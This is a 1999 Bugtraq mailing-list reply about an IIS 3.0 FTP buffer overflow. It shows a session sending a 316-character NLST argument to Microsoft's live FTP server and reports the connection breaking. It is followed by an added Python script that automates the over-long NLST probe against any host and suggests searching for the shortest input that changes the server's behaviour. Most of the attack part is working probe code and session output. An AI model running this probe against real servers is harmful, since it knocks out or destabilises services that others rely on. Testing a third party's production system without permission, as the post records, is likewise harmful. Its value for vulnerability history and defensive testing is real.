Bugtraq archives for 1st quarter (Jan-Mar) 1999: Re: IIS FTP Exploit/DoS Attack

Re: IIS FTP Exploit/DoS Attack

Cristian Ivan (civanUSA.NET)
Mon, 25 Jan 1999 03:06:42 +0200

Look what I've got after testing on ... ftp.microsoft.com :)

ftp> o ftp.microsoft.com
Connected to ftp.microsoft.com.
220 ftp Microsoft FTP Service (Version 3.0).
User (ftp.microsoft.com:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-This is FTP.MICROSOFT.COM
230-Please see the dirmap.txt file for
230-more information. An alternate
230-location for Windows NT Service
230-Packs is located at:
230-ftp://198.105.232.37/fixes/
230 Anonymous user logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
bussys
deskapps
developr
dirmap.htm
dirmap.txt
DISCLAIM.TXT
disclaimer.txt
HOMEMM.old
KBHelp
ls-lR.txt
ls-lR.Z
LS-LR.ZIP
MSCorp
peropsys
PRODUCT.TBL
Products
Services
Softlib
solutions
226 Transfer complete.
ftp: 204 bytes received in 0.05Seconds 4.08Kbytes/sec.
ftp> quote nlst AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
150 Opening ASCII mode data connection for file list.
ftp> ls
425 Can't open data connection.
ftp> ls
200 PORT command successful.
200 PORT command successful.
ftp> clos
150 Opening ASCII mode data connection for file list.
ftp> ls
Not connected.
ftp>

If instead of the "quote nlst AAA..." command you use "ls AA..." ... voila:

230 Anonymous user logged in.
ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
550 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA: The data area passed to a system call is too small.
ftp>
And everything is normal from here on...

I've used the ftp command supplied with Windows 98, which does not allow me
to type those 316 characters, "the smallest possible buffer to pass that
will overflow IIS". :)


                                        May the mail get in touch with you
                                                   cRIS

++++++++++++++++++++++++++++++++
+++++++++++888+88e+++888++dP"8++
++e88'888++888+888D++888++C8b+Y+  eMAIL: civanusa.net
+d888++'8++888+88"+++888+++Y8b++  IRC: cRIS (UNDERNET)
+Y888+++,++888+b,++++888+b+Y8D++  WEB: http://soon.to.come
++"88,e8'++888+88b,++888++8edP++
++++++++++++++++++++++++++++++++

"Learning to love yourself is the greatest love of all."

  * Whitney Houston
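A scripted version of the probe described in the post above, written here as an added example; it is not code from the original message, from Microsoft, or from any Bugtraq follow-up. It reproduces the two observations the post records: sending `NLST` with a long argument raw on the control channel (what the Windows ftp client's `quote` does) and then checking whether the control channel is still usable, and recognising the `550 ... The data area passed to a system call is too small` reply seen with `ls`. The function names `build_probe`, `classify_response` and `run_probe`, the `NOOP` follow-up, the timeout, and the lab host on the command line are all my assumptions; the 316-character length is the figure the post cites. Run it only against a host you are authorised to test.

```python
"""Probe an FTP server with an over-long NLST argument, as in the 1999 post.

Added example, not code from the original message. The function names,
the NOOP follow-up and the lab host are assumptions made for illustration.
"""
import ftplib
import socket
import sys

# The post names 316 characters as "the smallest possible buffer" that
# overflowed the IIS 3.0 FTP service; it is the default probe length here.
DEFAULT_PROBE_LEN = 316

# Text of the Win32 ERROR_INSUFFICIENT_BUFFER message as it appeared in the
# 550 reply quoted in the post (compared case-insensitively).
INSUFFICIENT_BUFFER_TEXT = "data area passed to a system call is too small"


def build_probe(length=DEFAULT_PROBE_LEN, fill="A"):
    """Return an NLST argument of exactly `length` copies of `fill`."""
    if length <= 0 or len(fill) != 1:
        raise ValueError("length must be positive and fill a single character")
    return fill * length


def classify_response(reply):
    """Map one control-channel reply line to a verdict string.

    150 -> 'accepted': the server claims to be opening a listing (the case
           in the post where the control channel then went into a bad state)
    550 carrying ERROR_INSUFFICIENT_BUFFER -> 'insufficient-buffer'
    other 4xx -> 'temporary-failure' (e.g. "425 Can't open data connection")
    other 5xx -> 'rejected'
    """
    code = reply[:3]
    if code == "150":
        return "accepted"
    if code == "550" and INSUFFICIENT_BUFFER_TEXT in reply.lower():
        return "insufficient-buffer"
    if code.startswith("4"):
        return "temporary-failure"
    if code.startswith("5"):
        return "rejected"
    return "other"


def run_probe(host, length=DEFAULT_PROBE_LEN, timeout=10.0):
    """Log in anonymously, send NLST <probe> raw (like the ftp client's
    `quote`, i.e. with no PORT/PASV first), then send NOOP to see whether
    the control channel is still in sync. Network I/O; lab use only.
    """
    result = {"probe_reply": None, "probe": None, "followup": None}
    ftp = ftplib.FTP(timeout=timeout)
    ftp.connect(host)
    ftp.login()  # anonymous login, as in the post
    try:
        try:
            # sendcmd sends one command and reads exactly one reply.
            reply = ftp.sendcmd("NLST " + build_probe(length))
        except ftplib.Error as exc:
            # ftplib raises on 4xx/5xx; the reply line is the message.
            reply = str(exc)
        except (socket.timeout, EOFError, ConnectionError):
            result["probe"] = "hung"
            return result
        result["probe_reply"] = reply
        result["probe"] = classify_response(reply)

        try:
            result["followup"] = "alive: " + ftp.sendcmd("NOOP")
        except ftplib.Error as exc:
            # A non-2xx answer to NOOP means a stale reply (such as the
            # "425 Can't open data connection" the post saw on its next ls)
            # was still queued on the control channel.
            result["followup"] = "desynchronised: " + str(exc)
        except (socket.timeout, EOFError, ConnectionError):
            result["followup"] = "dead"
    finally:
        ftp.close()
    return result


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: nlst_probe.py <lab-host> [length]")
    n = int(sys.argv[2]) if len(sys.argv) > 2 else DEFAULT_PROBE_LEN
    print(run_probe(sys.argv[1], n))
```

The `NOOP` follow-up is what distinguishes the two outcomes in the post: after `quote nlst` the server answered `150` but the next `ls` got a stale `425` and the session then dropped, whereas after `ls AAA...` the `550` came back immediately and the session stayed usable. Vary the second argument to find the shortest length that changes the verdict on a given build.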